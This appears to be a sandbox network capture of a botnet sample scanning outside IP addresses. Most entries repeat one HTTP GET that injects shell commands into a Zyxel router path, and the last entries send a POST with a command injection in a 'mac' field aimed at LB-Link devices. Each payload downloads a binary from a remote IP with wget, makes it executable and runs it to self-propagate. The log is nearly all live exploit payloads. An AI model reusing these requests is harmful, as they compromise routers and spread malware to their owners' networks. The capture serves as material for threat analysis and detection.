                                      Jan 14, 2024 15:50:47.323911905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4663192.168.2.1452520162.135.94.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.323965073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4664192.168.2.1456362144.160.79.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.324013948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4665192.168.2.143447292.56.196.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.324049950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4666192.168.2.1446244167.142.205.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.324125051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4667192.168.2.1458426188.124.196.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.324172974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4668192.168.2.144723498.230.82.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.324250937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4669192.168.2.1445420198.7.151.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.324280977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4670192.168.2.1456404154.81.125.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.324362040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4671192.168.2.1460770159.101.128.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.324417114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4672192.168.2.144944284.225.131.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.324481010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4673192.168.2.1440396172.86.27.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.324546099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4674192.168.2.144851483.2.37.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.324584961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4675192.168.2.143952863.143.73.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.324618101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4676192.168.2.1447042192.69.115.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.324665070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4677192.168.2.146094217.43.209.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.324734926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4678192.168.2.1453196126.145.114.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.324791908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4679192.168.2.1444022119.202.32.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.324811935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4680192.168.2.1445270105.233.244.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.324898005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4681192.168.2.1447782212.204.29.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.324944973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4682192.168.2.1445306187.226.221.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.324985027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4683192.168.2.1444384200.136.125.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.325037956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4684192.168.2.144940692.97.196.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.325100899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4685192.168.2.1439404141.192.228.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.325202942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4686192.168.2.1450640218.66.119.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.325246096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4687192.168.2.1446616136.63.217.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.325301886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4688192.168.2.1441980141.231.236.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.325350046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4689192.168.2.1454142178.85.143.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.325436115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4690192.168.2.1450862202.221.67.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.325478077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4691192.168.2.1445446148.83.40.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.325508118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4692192.168.2.143735853.156.25.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.325558901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4693192.168.2.1448154135.130.245.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.325587988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4694192.168.2.143461248.51.177.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.325640917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4695192.168.2.1453194151.107.133.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.325696945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4696192.168.2.143912620.164.19.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.325763941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4697192.168.2.1443284117.209.54.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.325813055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4698192.168.2.14445121.17.114.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.325875998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4699192.168.2.1451426115.149.96.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.325907946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4700192.168.2.145136493.18.134.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.325963020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4701192.168.2.1449396199.12.36.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.326042891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4702192.168.2.1447314223.77.148.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.326102972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4703192.168.2.1438438108.56.116.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.326160908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4704192.168.2.1448910151.34.79.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.326209068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4705192.168.2.1440186179.246.55.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.326246977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4706192.168.2.1438680216.11.160.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.326308966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4707192.168.2.1440584116.149.136.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.326370001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4708192.168.2.14537281.21.19.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.326405048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4709192.168.2.143320612.253.221.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.331270933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4710192.168.2.1449474198.167.84.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.331317902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4711192.168.2.1442820129.28.179.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.331378937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4712192.168.2.1434378177.244.45.1428080
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.297302008 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                      Jan 14, 2024 15:50:48.461216927 CET897INHTTP/1.0 404 Not Found
                                      Server: SonicWALL
                                      Expires: -1
                                      Cache-Control: no-cache
                                      Content-type: text/html;charset=UTF-8
                                      X-Content-Type-Options: nosniff
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 73 70 61 6e 2e 75 72 6c 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 20 7d 70 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 73 70 61 6e 2e 73 65 72 76 65 72 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 72 6c 22 3e 26 23 78 32 46 3b 67 6f 66 6f 72 6d 26 23 78 32 46 3b 73 65 74 5f 4c 69 6d 69 74 43 6c 69 65 6e 74 5f 63 66 67 3c 2f 73 70 61 6e 3e 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 70 3e 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 3c 68 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 32 3e 3c 70 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 65 72 76 65 72 22 3e 53 6f 6e 69 63 57 61 6c 6c 20 53 65 72 76 65 72 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>File not found!</title><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; }span.url { text-decoration: underline; }p {margin-left: 3em;}span.server {font-size: smaller;}/*...*/--></style></head><body><h1>File not found!</h1><p>The requested URL <span class="url">&#x2F;goform&#x2F;set_LimitClient_cfg</span> was not found on this server.</p><p>If you entered the URL manually please check your spelling and try again.</p><h2>Error 404</h2><p><span class="server">SonicWall Server</span></p></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4713192.168.2.144311637.60.60.738080
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.309957027 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
